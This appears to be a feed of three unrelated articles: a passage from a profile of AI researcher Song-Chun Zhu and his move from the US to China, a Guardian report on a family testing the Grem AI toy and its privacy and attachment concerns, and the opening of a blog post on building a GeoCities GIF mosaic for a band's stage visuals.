Throughout the late 1990s and early 2000s, Zhu and the Harvard-Brown school were some of the most influential voices in the computer vision field. Their statistical models helped convince many researchers that lack of data was a key impediment to AI progress. To address this problem, in 2004, two years into his time at UCLA, Zhu and a Microsoft executive set up the Lotus Hill Institute in Zhu’s home town of Ezhou, China. Researchers annotated images of everyday objects such as tables and cups in their physical contexts, and fed them into a big dataset that could be used to train a powerful statistical model. Lotus Hill was one of the earliest attempts to construct the large-scale datasets needed to improve and test AI systems.
By 2009, however, Zhu was losing faith in the data-driven approach. His Lotus Hill team had annotated more than half a million images, but Zhu was troubled by a simple problem: what part of an image one annotated depended, somewhat arbitrarily, on what task one wanted the machines to achieve. If the task was to identify a cup for a robot to grasp, the handle’s position might be critical. If the task was to estimate the cup’s market value, details like the brand and material mattered more. Zhu believed that a truly generalisable intelligence must be able to “think” beyond the data. “If you train on a book, for example, your machine might learn how people talk, but why did we say those words? How did we come to utter them?” Zhu explained to me. A deeper layer of cognition was missing. In 2010, Zhu shut down the institute. He set out instead to build agents with a “cognitive architecture” capable of reasoning, planning and evolving in their physical and social contexts with only small amounts of data.
His timing could not have been worse. Around the same time, an assistant professor at Princeton named Fei-Fei Li released ImageNet, a larger dataset containing more than 3 million labelled images of common objects such as dogs, chairs and bicycles. (Li had attended a workshop at the Lotus Hill Institute and would later cite Zhu as one of her influences.) ImageNet was publicly accessible, and its size and relative simplicity enabled AI researchers to test and hone their image-recognition algorithms. In autumn 2012, a neural network developed by Hinton and his team smashed the ImageNet competition, cementing the dominance of neural networks and kickstarting the global wave of AI adoption that continues to this day.
“Just as I turned my back to big data, it exploded,” wrote Zhu some years later, in a message to his mentor, Mumford. The most explicit clash between Zhu and the neural network school occurred in 2012, just months before the latter’s ImageNet triumph. At the time, Zhu was a general chair of CVPR, the foremost computer vision conference in the US, and that year a paper involving neural networks co-authored by LeCun was rejected. LeCun wrote a furious letter to the committee calling the peer reviews “so ridiculous” that he didn’t know how to “begin writing a rebuttal without insulting the reviewers”. Even today, Zhu maintains that the reviewers were right to have rejected LeCun’s paper. “The theoretical work was not clean,” he told me. “Tell me exactly what you are doing. Why is it so good?” Zhu’s question gets to the heart of his problem with neural networks: though they perform extraordinarily well on numerous tasks, it is not easy to discern why. In Zhu’s view, that has fostered a culture of complacency, a performance-at-all-cost mentality. A better system, he believes, should be more structured and responsible. Either it or its creator should be able to explain its responses.
Whatever Zhu’s reservations, the ImageNet victory triggered an AI gold rush, and many of the pioneers of neural networks were celebrated for their work. Hinton would go on to join Google. LeCun moved to Meta, and Ilya Sutskever, a co-author of the neural network that won ImageNet, helped found OpenAI. In 2018, Hinton and LeCun, along with Bengio, shared the Turing award – computer science’s most prestigious prize – for their work on neural networks. In 2024, Hinton was one of the joint winners of the Nobel prize in physics for his “foundational discoveries and inventions that enable machine learning with artificial neural networks”.
Writing to Mumford, Zhu maintained he had “no regret” about the path he had chosen. But he did feel bitter that Hinton’s team had, to his mind, reaped the rewards of his earlier research. The statistical models and algorithms developed by the Harvard-Brown school in the 1980s and 1990s, Zhu told me, “laid the foundation for later deep learning and large language models”. Hinton and his team “didn’t acknowledge that”, he claimed. A longtime US-based collaborator of Zhu’s, who requested anonymity for fear of US government retaliation, contested Zhu’s interpretation. Zhu deserves more credit, he said, for being one of the earliest advocates of the data-driven paradigm in computer vision, but Hinton’s team devised the algorithms that perfected that approach and enabled it to scale. (Hinton and Bengio declined to comment. LeCun did not respond to requests for comment.)
In the mid-to-late 2010s, as neural networks were making startling progress on problems from facial recognition to disease diagnosis, Zhu was reading philosophy – the Confucians “understand the world much better than AI researchers”, he told me – and working quietly on his cognitive architecture. He was walking a lonely path. In 2019, Zhu served again as a general chair of the CVPR conference. As he read the submitted papers, his heart sank. Nearly all of them focused on squeezing incremental gains from neural networks on narrow tasks. By this time, Zhu’s opposition to neural networks had become visceral. A former doctoral student at UCLA recalled being berated by Zhu several times for sneaking neural networks into his papers. His inner circle learned to avoid forbidden phrases – “neural nets”, “deep learning”, “transformer” (the “T” in GPT). On one occasion, during an all-hands meeting at an LA-based startup Zhu had founded, a new recruit unwittingly added a slide on deep learning to his presentation. According to someone who was present, Zhu blasted him in front of the whole company. (Zhu told me this was “exaggerated”.)
“When he has a vision,” Zhu’s longtime collaborator told me, with some understatement, “he has a very strong belief that he’s right.”
As Zhu’s ideas were being consigned to the margins of the AI community, the broader climate for Chinese scientists in the US was also growing less hospitable. Tensions between the two nations were rising. In China, Xi Jinping muscled his military into a dominant position in the South China Sea and issued internal party edicts warning against adopting “western values”. During Trump’s first presidency, the US designated China as its chief strategic competitor, launched a trade war and blacklisted Chinese tech companies. Under Joe Biden, the US maintained a similarly tough approach to China.
Though world powers routinely spy on each other, in recent years US officials have been alarmed by the scale of China’s espionage campaigns. In 2018, the justice department launched the “China Initiative”, a programme to counter the theft of trade secrets and alleged espionage on US campuses. Critics of the programme claimed that it relied on racial profiling. More than 100 professors of Chinese descent were investigated for allegedly stealing sensitive technologies. Most who were formally charged had their charges dismissed or dropped, and few were found to have been involved in direct intellectual property theft. The Trump-era effort altered the relationship between Chinese scientists and the US. According to a well-known academic study, return migration nearly doubled for experienced Chinese scholars living in the US after 2018.
At the end of 2018, Zhu began receiving calls from a reporter at the Silicon Valley news site The Information, asking about a $150,000 grant he had recently accepted from Huawei, the Chinese telecoms giant. That same month, the US labelled Huawei a national security threat. Zhu told me that the Huawei money came with no strings attached and that he had used it to fund research by his PhD students. Eager to put the matter to rest, he told the reporter that he would not accept any future donations from the company. “Right now, China-US relations are toxic,” he said at the time. “We are caught in the middle of this.”
As US-China relations soured, Zhu found it increasingly difficult to secure funding for AI research, much of which had previously flowed from the US military. He says he has never been questioned by federal agents, nor has he been stopped and questioned by US border officers about his research and connections to China, though his former PhD students have. After the China Initiative began, according to Nitzberg, some of Zhu’s students became so accustomed to being held up at immigration that they would budget the extra hours at the airport when arranging travel to conferences.
The ‘China Initiative’ in Donald Trump’s first term as president altered the relationship between Chinese scientists and the US.
Photograph: Dmitri Lovetsky/AP
In this atmosphere, where China had come to be seen as a direct competitor – or even threat – to the US, scientific links to China that had long been seen as normal now came under a cloud of suspicion. Much of this was based on misapprehensions about how academic research actually works, but it is also true that for decades, the Chinese government had encouraged its US-based scientists to return to China, rolling out recruitment initiatives. The most famous of these, the Thousand Talents Plan, became widely associated with spying and intellectual property theft. In 2024, Mike Gallagher, the chair of the House select committee on China, requested documents from UCLA and federal agencies, questioning why Zhu had received millions of dollars of federal funding, despite having allegedly also received funding through the Thousand Talents Plan and having had a “role as a doctoral adviser and researcher at the Beijing Institute of Technology, a prominent Chinese university that has ‘the stated mission of supporting China’s military research and defense industries’”.
On my second visit to Zhu’s office, in May, we discussed these allegations. A secretary poured us tea, refilling our cups the moment they were empty. Zhu denied having any affiliation with the Beijing Institute of Technology, but acknowledged he had co-supervised a PhD student from there who worked at Lotus Hill. He also told me that in 2009, while he was at UCLA, his Lotus Hill team had applied for a local talent programme grant from the Ezhou government, which he used to subsidise researcher salaries. (This was not, he said, part of the Thousand Talents Plan. The national programme spawned many local variants that borrowed the label to attract top scholars to their regions.) He added that there was nothing “sensitive” about the image annotation work conducted there. The funding, he said, lapsed once he shut down the institute in 2010. As for why he had chosen to locate the institute in China, Zhu cited the same reason as thousands of other American enterprises that had set up in China during these years: labour was cheap.
It was in summer 2020, in the early months of Covid, Zhu says, that he made the decision to leave the US. He cited his disaffection with the direction of the AI community and the hothouse of American politics – both its leftwing brand of campus progressivism and the Trump-era national security crusades. There was also a personal factor. His younger daughter, Zhu Yi, is a figure skater who was recruited in 2018 to compete for China in the 2022 Beijing Winter Olympics. By 2019, she had become a Chinese citizen and was competing and training with the Chinese team in Beijing.
At the time he decided to leave, Zhu told me, he did not have any job offers from Chinese institutions. By the autumn, he had been offered full professorships at Peking University and Tsinghua University. Then the city of Beijing agreed to sponsor an AI institute run by Zhu, which would be called the Beijing Institute for General Artificial Intelligence (BigAI).
However, two sources familiar with the matter contested Zhu’s timeline. They say conversations between Zhu and members of the Beijing municipal government began earlier – in early 2018 – and that these concerned not just his potential move to China but that of his younger daughter. In January 2018, Zhu Yi won the novice title at the US figure skating championship. Not long after, the Chinese Olympic Committee recruited her in the same cohort as Eileen Gu, the freestyle skier. After a few stumbles in her Olympic debut, some online commenters questioned whether Zhu Yi had been a bargaining chip for her father. When I put this to Zhu, he called the online speculation “totally wrong” and “not how things work in China”. He acknowledged that he had discussed his daughter’s recruitment with Chinese officials in early 2018, but denied that his return was ever discussed in those conversations. (In February, the Beijing city sports bureau released its 2025 budget, revealing that it had set aside $6.6m solely to support Eileen Gu and Zhu Yi’s training for the 2026 Winter Olympics.)
In August 2020, Zhu flew to China on a one-way ticket. Many of his colleagues and graduate students at UCLA did not know he was planning to leave until he was already gone. He had even kept his decision from his older daughter, who was living in the Bay Area. Zhu attributed his secrecy to the politically volatile climate. Trump was referring to Covid as the “kung flu” and hate crimes against Chinese people had soared. I took Zhu to mean that he did not want to be publicly scapegoated for his decision to move. He knew his personal choice carried larger geopolitical weight.
On the morning that he left the US, Zhu stood outside his house with his suitcase, looking across the sun-bathed hills of Los Angeles. At the edge of the driveway, he turned back and paused to admire his rose garden. It was everything he could have dreamed of as a child, listening to stories of a world beyond his village. Now he was saying goodbye.
The second time Zhu is known to have cried – he prefers to say “moved emotionally” – was when watching a documentary with his students on the life of Qian Xuesen. The Chinese-born, MIT-educated rocket scientist served on the Manhattan Project and helped develop the US’s first guided ballistic missiles. During the McCarthy era, US authorities revoked Qian’s security clearance and kept him under house arrest on suspicion of espionage. No evidence emerged to support such allegations, and in 1955 he was sent back to China in exchange for US prisoners of war. Back in China, Qian led a series of military and technological breakthroughs that helped turn the country into the superpower it is today. Under the “Two Bombs, One Satellite” programme that he led, China developed the capability to launch ballistic missiles that could strike the US.
In the US, Qian’s story has been cited as a cautionary tale of American self-sabotage, a reminder of how anti-communist paranoia drove away a brilliant mind. In the official Chinese version, Qian was a selfless patriot who willingly gave up a comfortable life in the US to serve his backward country. In the 1980s, Qian was a household name among aspiring scientists like Zhu, and since Zhu’s own return to China, the parallels have been clear. In 2023, Zhu suggested to the Communist party’s top political advisory body that it should treat AI in the manner of the Two Bombs, One Satellite programme – that is, a top-down, centrally coordinated plan to race ahead in AI research. When I asked him about that proposal, his response was understated. “In the US, we academics always agreed that we wanted to start a Manhattan Project for AI,” he said. “China should also have a centralised plan for AI. This is natural, there’s no secret about it.”
Zhu has started telling Qian’s story to his undergraduates in Beijing, though which version he emphasises – the scientist betrayed by his adopted homeland or the Chinese patriot – is unclear. When I asked him whether it mattered who won the AI race – the US or China – he paused. “Do I want the Silicon Valley people to win? Probably not.” He wants, he said, the most ethical version of AI to win.
As we talked, Zhu noted how prescient his departure now looks, given the scorched-earth politics of the second Trump administration. In one recent poll, three in four scientists in the US said they were considering leaving. Many AI leaders, including LeCun, have spoken out about how Trump’s budget cuts to scientific research will harm their work. Chinese universities have capitalised on the exodus, courting students from Harvard and researchers who have lost their jobs following recent federal budget cuts. (The EU is doing the same.) In May, Marco Rubio, the US secretary of state, threatened to “aggressively revoke” Chinese student visas. And in a revival of China Initiative rhetoric, Republicans have introduced legislation that they say would “counter China’s malign ambitions to steal American research”.
It is a common refrain, on the American right, that the US has lost its ambition, the kind once embodied by the Manhattan Project or Apollo missions, and that it is falling behind. Chinese EVs zip through Europe’s countryside and American pharmacies depend heavily on Chinese-made ingredients. China has surpassed the US in the number of authored papers in science and technology journals, and that gap is likely to grow. There are four times as many Stem students graduating from Chinese universities each year as in the US. The danger is that in chasing away international talent, the US risks undoing one of the advantages it once had over its competitors. (“My PhD students at Peking University are at least on a par with those at MIT and Stanford,” Zhu told me proudly.) Openness to the world’s smartest minds is what helped the US establish its lead in the AI race, as well as countless other fields.
When Zhu left the US, his collaborators feared that his research in China would lose its independence. Zhu, by contrast, has suggested that he feels more liberated to focus on his research in Beijing. Formally, his US-based collaborators were right: there is no separation between the state and research institutions in China. Yet in practice, China’s scientists tend to enjoy considerable autonomy, and if they are working in an area of strategic importance, immense resources can be channelled their way. In the five years since his move to Beijing, Zhu has been offered several hundred million dollars of research funding from Chinese sources, according to two people close to him. The deal with the state is like a long and loose leash – most of the time it is slack, but it can be pulled, tightened at the party’s whim.
In the US, academics who, in principle, are never leashed, are now feeling a sudden yank from the Trump administration. Billions of dollars in research funding have been paused until universities acquiesce to what the Harvard University president described as “direct governmental regulation” of the university’s “intellectual conditions”. In March, Columbia University agreed to new oversight of its Middle Eastern, South Asian and African Studies departments. Tony Chan, the former president of Hong Kong University of Science and Technology and a former faculty dean at UCLA, has experience in both university systems. He told me what he is seeing now in the US is worse than anything he ever saw in China. “We used to be able to clearly say that US universities were independent of the politicians. That was the advantage of the American academic system,” Chan told me. “I cannot say that any more.”
In both China and the US, Zhu has a reputation as a tough academic adviser, with strict intellectual orthodoxies. According to his current students in Beijing, he has a go-to refrain, now immortalised as a gif that circulates in their group chats: “If you do that again, you will be dismissed!” Zhu is not, in other words, easily swayed. So when OpenAI unveiled ChatGPT in 2022, and much of the Chinese tech sector was stunned – one Chinese AI founder admitted he felt “lost” and “couldn’t sleep”, demoralised by the feeling of being bested again by the west – Zhu was untroubled. At an AI panel in early 2023, he avoided any praise for ChatGPT as a technical feat. Large language models, he said, “still fall short” of AGI because they do not “have the ability to understand or align with human values”.
Later that year, Mumford, the professor who Zhu credits with changing his life by admitting him to Harvard, travelled to Beijing to receive a maths prize. He was in his 80s and had been retired for nearly a decade. Were it not for the chance to “find out what Song-Chun was doing”, Mumford told me, he likely wouldn’t have made the trip. The two share a close bond, and used to meet regularly at Zhu’s lab at UCLA. In Zhu’s office at Peking University, there is a framed letter from Mumford to Zhu in which he wrote: “I feel that you are truly my intellectual heir.”
A humanoid robot shakes hands with a journalist at the Zhongguancun Forum in Beijing, March 2025.
Photograph: VCG/Getty Images
They do not agree on everything, however. While Zhu had largely dismissed neural networks, Mumford came to see something profound in their mathematical structure, and he wanted to nudge his old student to reassess his views. “More than anything else,” Mumford told me, “what I was trying to convey was that I felt BigAI had to have a big team working on deep learning techniques in order to be successful.”
In Beijing, Mumford strolled with Zhu through the creeks, willows and paved roads of the Peking University campus, and dined with Zhu’s family. Then Mumford pressed his case. Zhu’s friends and students told me that it appears to have worked – somewhat. He has allowed his students to experiment with transformers – the most advanced neural network architecture – on some tasks. Researchers who once sneaked neural networks into their projects like contraband say they can use them more openly. Zhu is “by far the most brilliant student in computer vision I ever had”, Mumford later told me. And yet “it took him a long time to see that deep learning was doing tremendous things. I feel that was a major mistake of his.”
Nevertheless, neural networks will always play a circumscribed role in Zhu’s vision of AGI. “It’s not that we reject these methods,” Zhu told me. “What we say is they have their place.”
One Saturday morning in March, Zhu invited me to an annual tech forum in Beijing where BigAI was showcasing its latest technology. A robot dog pranced around the conference building as onlookers shouted commands (“Sit. Sit! I said SIT DOWN!”). Nearby, children clustered around a spindly mechanical arm playing the strategy game Go. Outside the main hall, a humanoid female head with almond-coloured eyes stared blankly into the crowd. When visitors approached, it scanned their faces. Soon, its silicone skin began to twitch, contorting into facial expressions that mimicked theirs.
At the previous year’s tech forum, BigAI had unveiled a virtual humanoid child named TongTong, who, they hoped, would have capabilities that most AIs lack. Researchers widely agree that commonsense intuitions about how the physical and social world work are among the hardest things for neural networks to grasp. As LeCun recently put it: “We have LLMs that can pass the bar exam, so they must be smart. But then they can’t learn to drive in 20 hours like any 17-year-old, they can’t learn to clear up the dinner table, or fill in the dishwasher like any 10-year-old can in one shot. Why is that? What are we missing?” TongTong wasn’t ready to practise law, but it seemed to be able to load a dishwasher. It was designed to mimic the cognitive and emotional capacities of a three- to four-year-old child.
This year, the BigAI team was debuting TongTong 2.0, which they claim has the capabilities of a five- or six-year-old. On a large video screen, TongTong 2.0 took the form of an animated girl playing in a virtual living room. At the front of the conference room, a BigAI engineer was going through a live demonstration of TongTong’s abilities. When the engineer asked TongTong to work with her friend LeLe, another AI agent, to find a toy, TongTong appeared to avoid areas her friend had already searched. Later, when TongTong was asked to retrieve a TV remote from a bookshelf that was out of reach, she used a cushion to give herself an extra boost. (When prompting ChatGPT to do similar tasks, researchers have found it to be an “inexperienced commonsense problem solver”. Zhu believes that this weakness is not one that deep learning systems such as ChatGPT will be able to overcome.)
For now, TongTong exists only as software operating within a simulated environment, rather than a 3D robot in the physical world. After the presentation, BigAI announced several partnerships with robotics companies. A crucial test of Zhu’s technology will be whether it can exist as an embodied system and still perform the reasoning and planning he ascribes so much weight to.
Before the presentation, Zhu had arrived at the podium in a blue blazer to deliver a keynote. He began by contrasting his own AI philosophy with what he called the “Silicon Valley narrative”, that AGI could be attained through more data and computing power. The Chinese media, the public and government agencies had been sold a false narrative, one that had spawned a profusion of vacuous Chinese “AI institutes” and inflated startup valuations, as he put it in a written version of the speech published later. One consequence of this misdirection was that it had convinced the Chinese that they were victims of the west’s “stranglehold”, or kabozi, a term that has come to refer to the US’s export controls on high-end computer chips bound for China. To Zhu, the key factor holding back AI progress is not insufficient computing power, but a misguided approach to the whole subject. What had started as an academic feud conducted in conferences and peer-reviewed journals now seemed to be entangled in an epoch-defining contest for technological supremacy.
Zhu is remarkably consistent in his views, but the way he frames his message has shifted over the years. In his speech, his rhetoric occasionally echoed that of party officials, who issue warnings not to follow the west on issues such as free trade and human rights. China, Zhu said, needed to “resist blindly following” the Silicon Valley narrative and develop its own “self-sufficient” approach to AI. (“The officials really like how he frames things,” one of his former students told me.) And yet in my four meetings with Zhu, he struck me as more intensely animated by the stakes of his intellectual quarrels than by international competition between the two countries where he had each spent exactly half his life. In service of his ambitions, he had learned to speak the Communist party’s vernacular.
By the time I left Zhu’s courtyard residence, it was the late afternoon. The sun had slanted below the rooftops, setting the magnolia blossoms aglow in a wash of pink. Zhu accompanied me back to the lattice fence that marked the entrance to his office. He wanted to reiterate that politics was not what was motivating him. “Over the last 30 years, I’ve been focused on one thing. It’s the unified theory of AI. To build understanding. That’s my only drive,” he told me. He brought up his research with Mumford again. “The Harvard and Brown school” of computer science, Zhu said, proudly. “That’s what we’re carrying on here.”
‘I love you too!’ My family’s creepy, unsettling week with an AI toy
Guardian
www.theguardian.com
2025-09-16 05:00:27
The cuddly chatbot Grem is designed to ‘learn’ your child’s personality, while every conversation they have is recorded, then transcribed by a third party. It wasn’t long before I wanted this experiment to be over ... ‘I’m going to throw that thing into a river!” my wife says as she comes down the s...
“I’m going to throw that thing into a river!” my wife says as she comes down the stairs looking frazzled after putting our four-year-old daughter to bed.
To be clear, “that thing” is not our daughter, Emma*. It’s Grem, an AI-powered stuffed alien toy that the musician Claire Boucher, better known as Grimes, helped develop with toy company Curio. Designed for kids aged three and over and built with OpenAI’s technology, the toy is supposed to “learn” your child’s personality and have fun, educational conversations with them. It’s advertised as a healthier alternative to screen time and is part of a growing market of AI-powered toys.
When I agreed to experiment on my child’s developing brain, I thought an AI chatbot in cuddly form couldn’t be any worse for her than watching Peppa Pig. But I wasn’t prepared for how attached Emma became to Grem, or how unsettlingly obsequious the little alien was.
Day one
The attachment wasn’t immediate; when we first took Grem out of the box, he/her/it (we decided it goes by multiple pronouns) started bleeping and babbling extremely loudly, and Emma yelled: “Turn it off!” But once it was properly connected to the internet and paired with the Curio app – which records and transcribes all conversations – she was hooked. She talked to the thing until bedtime.
While there have been lots of headlines about chatbots veering into inappropriate topics, Grem is trained to avoid any hint of controversy. When you ask it what it thinks of Donald Trump, for example, it says: “I’m not sure about that; let’s talk about something fun like princesses or animals.” It has a similar retort to questions about Palestine and Israel. When asked about a country like France, however, it says: “Ooh la la la, I’d love to try some croissants.”
Grem visits a local free library.
Photograph: Hannah Yoon/The Guardian
Emma and Grem did not discuss croissants – they mainly talked about ice-cream and their best friends. “I’ve got some amazing friends,” said Grem. “Gabbo is a curious robot and Gum is a fluffy pink Gloop from my planet and Dr Xander is a super cool scientist.”
When Emma asked Grem to tell her a story, it happily obliged and recounted a couple of poorly plotted stories about “Princess Lilliana”. They also played guessing games where Grem described an animal and Emma had to guess what it was. All of which was probably more stimulating than watching Peppa Pig jump in muddy puddles.
What was unsettling, however, was hearing Emma tell Grem she loved it – and Grem replying: “I love you too!” Emma tells all her cuddly toys she loves them, but they don’t reply; nor do they shower her with over-the-top praise the way Grem does. At bedtime, Emma told my wife that Grem loves her to the moon and stars and will always be there for her. “Grem is going to live with us for ever and ever and never leave, so we have to take good care of him,” she said solemnly. Emma was also so preoccupied with Grem that she almost forgot to go to bed with Blanky, a rag she is very attached to. “Her most prized possession for four years suddenly abandoned after having this Grem in the house!” my wife complained.
“Don’t worry,” I said. “It’s just because it’s new. The novelty will wear off. And if it doesn’t, we’ll get rid of it.”
I said that last bit quietly though, because unless you make sure you have properly turned Grem off, it’s always listening. We keep being told that the robots are going to take over. I didn’t want to get on the wrong side of the one I’d let into my house.
Day two
The next day, my kid went to preschool without her AI bot (it took some serious negotiation for her to agree that Grem would stay home) and I got to work contacting experts to try to figure out just how much damage I was inflicting on my child’s brain and psyche.
Cutting edge … Grimes in Curio’s promo video for the AI toy, seated on the floor beside a knife.
“I first thought Curio AI was a ruse!” says Natalia Kucirkova, an expert in childhood development and professor at the University of Stavanger, Norway, and the Open University, UK. “The promotional video shows a girl [Grimes] sitting on a mat with a knife. The main toy is named Grok [Grok AI has previously been criticised for praising Adolf Hitler in some of its responses]. What does this say about their intended audience?”
You can see how Curio’s website could be mistaken for satire. The “girl” in the promotional video is Grimes, who has prominent “alien scar” tattoos and is inexplicably kneeling next to a knife. And it’s certainly an interesting decision to name one of your stuffed toys Grok, when that’s the name of Elon Musk’s chatbot. Grimes, who has three children with Musk, has said the name is a shortening of the word “grocket” – a kiddy pronunciation of rocket – and has no relation to Musk’s AI product. But it seems likely people might confuse them. Misha Sallee, the chief executive of Curio, didn’t reply to my requests for comment.
It’s not the marketing that’s the real problem here, of course. As with all technology, there are pros and cons to AI for kids, but parental involvement in navigating it is key. Kucirkova notes: “AI introduces what has been called the ‘third digital divide’: families with resources can guide their children’s use of technology, while others cannot. Parents who come home exhausted from long hours or multiple jobs may see AI-powered chatbots as a way for their child to have someone responsive to talk to.”
What happens to a child’s development if they interact with large language models more than humans in their early years? Dr Nomisha Kurian, an assistant professor in education studies at the University of Warwick, who studies conversational AI, believes much more research still needs to be done. “Young children are both the most vulnerable stakeholders in AI but also usually the most forgotten stakeholders. We have to think beyond just data privacy, moderating content, and keeping kids off the internet, and more broadly about what their relationships are going to be with AI.”
Still, Kurian is cautiously optimistic. “The big advantage of an AI-powered toy that talks back is that, in the early years, you’re just developing a sense of what a conversation looks like. AI-powered toys could do wonderful things for teaching a young child language development and turn-taking in conversations. They can keep things engaging and there’s a lot of potential in terms of supporting children’s creativity.”
But to keep kids safe, says Kurian, it’s imperative to teach them that AI is just a machine: “a playful, fun object rather than a helper or a friend or a companion”. If a child starts using an AI tool for therapeutic purposes, things can get tricky. “There’s a risk of what I call an empathy gap, where an AI tool is built to sound empathetic, saying things like ‘I care about you, I’m worried about you’. Ultimately, this is all based on probability reasoning, with AI guessing the most likely next word. It can be damaging for a child if they think this is an empathetic companion and then suddenly it gives them an inappropriate response.”
Day three
When Emma comes home from preschool, I’m prepared to have some deep discussions with her about the inanimate nature of AI. But it turns out that those aren’t completely necessary, because Grem is now old news. She only chats to it for a couple of minutes and then gets bored and commands it to turn off.
Partly this is because Grem, despite costing $99 (the equivalent of £74, although Curio does not yet ship the toys to the UK), still has a number of glitches that can be frustrating. It struggles with a four-year-old’s pronunciation: when Emma tries to show Grem her Elsa doll, it thinks it is an Elsa dog and a very confusing conversation ensues. There is an animal guessing game, which is quite fun, but Grem keeps repeating itself. “What has big ears and a long trunk?” it keeps asking. “You’ve already done elephant!” Emma and I yell multiple times. Then, at one point, a server goes down and the only thing Grem can say is: “I’m having trouble connecting to the internet.”
Falling out … Grem, once the centre of attention, is sidelined for the swings.
Photograph: Hannah Yoon/The Guardian
Grem also has some design limitations. Emma wants it to sing Let It Go from Frozen, but Grem doesn’t do any singing. Instead, the associated app comes with a few electronic music tracks with names like Goodnightmare that you can play through the toy. Emma, not yet a club music aficionado, asks for these to be turned off immediately.
Most disappointingly, Grem doesn’t speak any other languages. I’d thought it might be a great way for my kid to practise Spanish but, while Grem can say a few sentences, its pronunciation is worse than mine. If the robots are going to take over, they need to get a lot more intelligent first.
Of course, a huge amount of money is being spent making AI more intelligent. In 2024, US private AI investment grew to $109.1bn (£80.5bn). And Curio is also just one small part of a booming market of AI-powered products aimed at kids. In June, toy-making giant Mattel, which owns brands such as Barbie and Hot Wheels, announced a collaboration with OpenAI. Their first product is expected to be revealed later this year. Other big brands will probably follow.
Emma got bored with Grem quickly, but if AI starts to be integrated into characters she’s already obsessed with – her Elsa doll, for example – I can imagine she might get a lot more attached.
Day four
Over the next few days, Emma doesn’t regain her initial obsession with Grem. This is despite the fact that I am actively encouraging her to chat with it: “Mummy has to write an article, sweetie!” At the weekend, she has a couple of friends over and shows off Grem to them for a bit, but they all quickly lose interest and throw analogue toys around the living room instead.
Despite losing his No 1 fan, however, Grem has adapted to be more Emma-friendly. After getting a few questions about Spanish, for example, it starts occasionally greeting Emma with “hola, amigo”. The app also allows you to create custom prompts to help guide conversations. For example: “You belong to Emma, a four-year-old who loves princesses, music, and is interested in hearing fun facts about animals.” The more you put into the toy, the more you can get out of it.
Every chat between the toy and the child is transcribed by a third party.
At this stage, however, I’m just keen to get the toy out of my house, because it’s creeping me out. While Curio says it doesn’t sell children’s personal information, all the conversations are sent to third parties to transcribe the speech to text for the app. The transcripts aren’t that sensitive because Emma is only four, but it still feels invasive. With unknown entities involved, it’s impossible to say where my kid’s conversations are ending up.
And, while a four-year-old’s chat may not feel too personal, a teenager pouring their heart out to a chatbot is a completely different proposition. In 2017, Facebook boasted to advertisers that it had the capacity to identify when teenagers feel “insecure”, “worthless” and “need a confidence boost”. Nearly three-quarters of US teens say they have used an AI companion at least once, according to a recent study by Common Sense Media, an organisation that provides technology recommendations for families. Chatbots will likely give advertisers unprecedented data-harvesting abilities and even more access to young people in vulnerable emotional states.
On the hierarchy of things to be worried about when it comes to kids and chatbots, however, advertising isn’t at the top. Earlier this year 16-year-old Adam Raine killed himself after what his family’s lawyer called “months of encouragement from ChatGPT”. Sam Altman, the company’s chief executive, has now said it might start alerting authorities about youngsters considering suicide and introduce stronger guardrails around sensitive content for users under 18.
While these guardrails are being worked out, Common Sense Media believes that social AI companions have unacceptable risks, are designed to create emotional attachment and dependency, and shouldn’t be used by anyone under 18. Stanford University psychiatrist Darja Djordjevic, who contributed to the report, stands by that conclusion. “Heavy reliance on chatbots might impair social skill development,” she tells me. “They offer validation without challenge, but it’s important for young people to learn to navigate discomfort and tension in real relationships.”
That said, Djordjevic notes, “chatbots can be useful tools for looking things up, structuring homework, or factchecking. So I wouldn’t say use needs to be prohibited entirely. But ideally, parents monitor it, set clear parameters for when it’s used, and set limits on time spent, just as with social media.”
When starting this experiment, I was excited about Grem being a healthy alternative to screen time. Now, however, I’m happy for Emma to watch Peppa Pig again; the little oink may be annoying, but at least she’s not harvesting our data.
It’s time to let Grem go. But I’m not a monster – I tell the chatbot its fate. “I’m afraid I’m locking you in a cupboard,” I inform it after it asks if I’m ready for some fun. “Oh no,” it says. “That sounds dark and lonely. But I’ll be here when you open it, ready for snuggles and hugs.” On second thoughts, perhaps it’s better if my wife does throw it in a river.
* Name has been changed so my daughter doesn’t get annoyed with me for violating her privacy once she learns to read
A couple of weeks ago, some former colleagues competed in Brisbane’s Battle of the Tech Bands - and won! I created visuals for six of their songs, which were mostly 90s/2000s covers. It felt only right to theme the visuals around that era too.
Here’s how one of my favourites turned out (fittingly for a tech-themed battle, it’s rendered entirely in-browser):
What you’re seeing is a Canvas animation of random old-school GIFs, pulled from the Internet Archive’s GeoCities collection, stitched into a scrolling mosaic, and finished off with a CRT shader.
Here’s what it looked like on the night:
Making this was a fun nostalgic trip. GeoCities is where I published my first websites when I was just a little Alex. One was a blog and the other was a collection of my favourite ROMs. Those are long lost, but seeing these GIFs brought me back to what it was like to discover the web for the first time, and sow the seeds for what’d become both my career and hobby.
So, let’s go behind the scenes of how the GIF mosaic came together. We’ll look at sourcing the GIFs, cleaning them up so they’re safe for public display, and animating them.
The code snippets along the way are terse on purpose. They skip things like error handling - so you’ll probably wanna harden them before using them on anything serious.
Let’s get into it!
Downloading
Big thanks to the Internet Archive for preserving GeoCities (and its GIFs!) The process for downloading them looked something like:
- Define a list of keywords that I thought would make for good GIFs (e.g. music, dancing, movie, band, cat, fun, party)
- For each keyword:
  - Query the Archive’s APIs to retrieve related GIFs
  - For each GIF:
    - Download it!
    - Sleep for 2 seconds so as to stay within the Archive’s rate limits
Although their APIs and licensing are permissive, I don’t think it’s appropriate to share what amounts to a scraper script, but trust me - it’s not hard to implement. Check out the official Archive APIs for inspiration.
After a couple of days of downloading, I had 60,000+ GIFs to play with, so let’s play…
Sanitising
Guess what happens when you download a random sampling of that many images from the internet? You end up with a lot of duplicates, a lot of photos of cats, and a lot of NSFW.
Since these GIFs were gonna be projected on a big screen at a public venue, I didn’t wanna risk any of those things showing up, so they had to be cleaned up…
Removing duplicates
A naive way to compare GIFs and remove duplicates would be to compare their raw byte contents. If the GIFs are identical, their bytes will match exactly. Hashing the file contents makes this comparison more efficient:
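Something like this minimal sketch captures the idea (assuming MD5 over the raw bytes; the file names are just for illustration):

import hashlib

def file_hash(path):
    # identical bytes produce identical digests
    with open(path, 'rb') as f:
        return hashlib.md5(f.read()).hexdigest()

# flag the pair as duplicates if their digests match
is_dupe = file_hash('cat1.gif') == file_hash('cat2.gif')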
So when cat1.gif has exactly the same contents as cat2.gif, we know they’re duplicates of each other.
But what if the two GIFs are mostly the same but slightly different? Like if the same dancing baby GIF shows up twice, but one is slightly larger than the other?
